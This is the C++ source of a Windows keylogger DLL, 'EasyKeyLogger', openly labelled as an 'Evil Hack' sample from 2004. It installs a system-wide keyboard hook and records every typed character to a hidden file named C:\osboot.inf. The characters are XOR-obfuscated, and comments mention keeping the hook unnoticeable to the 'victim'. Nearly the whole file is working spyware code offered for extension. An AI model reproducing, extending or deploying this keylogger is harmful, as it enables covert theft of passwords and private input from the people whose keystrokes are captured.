EasyKeyLogger/DLL/EasyKeyLoggerDLL/DLLMain.cpp
// Downloaded from www.louis‑coder.com.
// Easy VC++ keylogger, can be extended by anyone.
// Evil Hack is a synonym, sample was created by Louis Coder.
// For questions or comments mail louis@louis‑coder.com.
// (c)2004 by Böser Hacker
// (c)2004 by Evil Hacker
//
// Hinweis: KeyHook *MUSS* in einer DLL erstellt werden (s. MSDN)
// NOTE: KeyHook *MUST* be created in a dll (see MSDN)
#include <windows.h> // für winuser.h u.a./for winuser.h and others
#include <winuser.h> // SetWindowsHookEx u.a.
#include <stdio.h> // C Datei‑Operationen/C file‑operations
// Proto‑Typen
LRESULT CALLBACK KeyboardProc (
int nCode, // hook code
WPARAM wParam, // virtual‑key code
LPARAM lParam // keystroke‑message information
);
BOOL WINAPI KeyHook_Install();
void WINAPI KeyHook_Remove();
LRESULT CALLBACK KeyboardProc (
int code, // hook code
WPARAM wParam, // virtual‑key code
LPARAM lParam // keystroke‑message information
);
// Globale Variablen/global vars
#pragma data_seg(".SHARDAT") // nötig, damit mehrere Programm‑Instanzen diese DLL nutzen können/required to allow multiple program‑instances use this dll
static HHOOK HookHandle = NULL; // Rückgabewert von KeyHook‑Erstellungsfunktion/return value of keyhook‑creation function
char LogFile[MAX_PATH] = {"C:\\osboot.inf"}; // hier wird Hinein‑ge‑logged/that's where's logged
#pragma data_seg()
HINSTANCE hInstance; // DLL‑Instanz‑Handle/dll instance‑handle
BOOL WINAPI DllMain (HINSTANCE hInst, DWORD fdwreason, LPVOID lpReserved)
{ // wird automatisch zu bestimmten Anlässen (s. switch‑Block) aufgerufen/is called automatically on special events (see switch‑blocks)
switch (fdwreason)
{
case DLL_PROCESS_ATTACH: // Programm‑Instanz lädt DLL/program instance loads dll
hInstance = hInst; // lokal zu global/local to global
break;
case DLL_THREAD_ATTACH: // Programm‑Instanz erstellt neuen Thread/program instance creates new thread
break;
case DLL_THREAD_DETACH: // Thread beendet/thread terminated
break;
case DLL_PROCESS_DETACH: // Programm wird beendet oder DLL entladen/program is quit or dll unloaded
{
KeyHook_Remove();
break;
}
}
return TRUE;
}
BOOL WINAPI KeyHook_Install()
{ // erstellt KeyHook für aktuelle Instanz/creates KeyHook for current instance
if (!HookHandle) // nicht zweimal, sonst Win32‑GAU/not twice, otherwise WIN32‑'accident'
{
HookHandle = SetWindowsHookEx (
WH_KEYBOARD, // type of hook to install (WH_MOUSE, WH_SHELL, etc.)
(HOOKPROC)KeyboardProc, // address of hook procedure
hInstance, // handle of application instance
0 // identity of thread to install hook for (0: Windows‑wide)
);
return TRUE;
}
else
return FALSE; // aufrufendes Programm sollte sich beenden/calling program should terminate itself
}
void WINAPI KeyHook_Remove()
{ // entfernt KeyHook (wichtig, v.a. auf Win32, sonst Bluescreen)/removes KeyHook (important, especially on Win32, otherwise blue screen)
if (HookHandle)
if (UnhookWindowsHookEx (HookHandle))
HookHandle = 0;
}
LRESULT CALLBACK KeyboardProc (
int nCode, // hook code
WPARAM wParam, // virtual‑key code
LPARAM lParam // keystroke‑message information
)
{ // Wird von Windows aufgerufen, wenn innerhalb von Windows eine
// Taste gedrückt wird oder gedrückt gehalten wird.
// Alle KeyHook‑Callback Prozeduren werden in einer Kette aufgerufen
// (bei langsamer oder fehlender Weiterleitung ruckt bzw. versagt
// Eingabe, für Opfer sichtbar).
// Is called by Window when a key is pressed or kept pressed within
// Windows. All KeyHook‑callback procedures are called in a chain
// (for slow or missing forwarding the input is jerking or fails
// completely, notable for victim).
char WriteChar;
char LogFileLocal[MAX_PATH];
// nötig, damit mehrere Programm‑Instanzen diese DLL nutzen können/required to allow multiple program instances use this dll
strcpy (LogFileLocal, LogFile);
if (nCode == HC_ACTION) // nicht alles, was kommt ist ein Tastendruck (s. MSDN)/not everything that arrives is a key press (see MSDN)
{
if (lParam & 0x40000000) // Taste neu gedrückt oder 'offizielle' Wiederholung/key just pressed or 'official' repeating
{
if ((wParam == VK_SPACE) || (wParam == VK_RETURN) ||
((wParam >= 0x2f ) && (wParam <= 0x100))) // Tasten‑Filter/key‑filter
{
FILE *FileDescriptor = fopen (LogFileLocal, "a+"); // append‑Modus/append‑mode
if (FileDescriptor)
{
if (wParam == VK_RETURN)
{
WriteChar = '\n';
fwrite (&WriteChar, 1, 1, FileDescriptor);
}
else
{
// Code‑Block aus Sample, das aus einem anderen Sample
// erstellt wurde, das aus der MSDN‑Hilfe abgeschrieben ist:
// code block from sample that was created out of an other
// sample which has been copied from MSDN help:
BYTE KeyboardStateCurrent[256];
WORD KeyTranslated;
UINT KeyScanCode = 0;
// Status aller 256 VIRTUELLEN Tasten abfragen/receive state of all 256 VIRTUAL keys
GetKeyboardState (KeyboardStateCurrent);
// ASCII‑Code aus KeyHook‑ und KeyboardState Daten ermitteln/get ASCII‑code from KeyHook‑ and KeyboardState data
ToAscii(
wParam, // virtual‑key code
KeyScanCode, // scan code
KeyboardStateCurrent, // address of key‑state array
&KeyTranslated, // buffer for translated key
0 // active‑menu flag
);
WriteChar = (char)KeyTranslated;
WriteChar = WriteChar ^ 99; // billig‑Verschlüsselung (XOR)/cheap encryption (XOR)
fwrite (&WriteChar, 1, 1, FileDescriptor);
}
fclose (FileDescriptor);
}
}
}
}
// Tastendruck in Kette weiterleiten (evtl. an andere Programme)/forward key press in chain (possibly to other programs)
return CallNextHookEx (HookHandle, nCode, wParam, lParam);
}
[END OF FILE]